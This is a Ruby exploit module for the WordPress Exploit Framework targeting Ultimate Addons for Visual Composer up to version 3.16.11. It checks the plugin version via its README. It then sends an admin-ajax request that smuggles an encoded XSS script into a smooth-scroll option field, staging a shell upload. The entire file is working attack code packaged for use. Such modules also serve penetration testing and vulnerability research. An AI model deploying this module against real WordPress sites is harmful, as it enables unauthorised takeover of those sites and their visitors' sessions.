# frozen_string_literal: true

class Wpxf::Exploit::UltimateAddonsForVCReflectedStoredXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::StagedReflectedXss

  def initialize
    super

    update_info(
      name: 'Ultimate Addons for Visual Composer <= 3.16.11 Reflected XSS Shell Upload',
      author: [
        'WpHutte',   # Disclosure
        'rastating'  # WPXF module
      ],
      references: [
        ['WPVDB', '8821'],
        ['URL', 'http://wphutte.com/ultimate-addons-for-visual-composer-v3-16-10-xss-csrf-rce/']
      ],
      date: 'Apr 16 2017'
    )
  end

  def check
    readme = normalize_uri(wordpress_url_plugins, 'Ultimate_VC_Addons', 'README')
    check_version_from_custom_file(readme, /Version:<\/strong>\s((\d+\.?)+)/, '3.16.12')
  end

  def initial_script
    create_basic_post_script(
      wordpress_url_admin_ajax,
      'action'                                => 'update_ultimate_options',
      'ultimate_smooth_scroll'                => 'enable',
      'ultimate_smooth_scroll_options[speed]' => Utility::Text.rand_numeric(2),
      'ultimate_smooth_scroll_options[step]'  => "#{Utility::Text.rand_numeric(2)}; #{xss_ascii_encoded_include_script}"
    )
  end
end
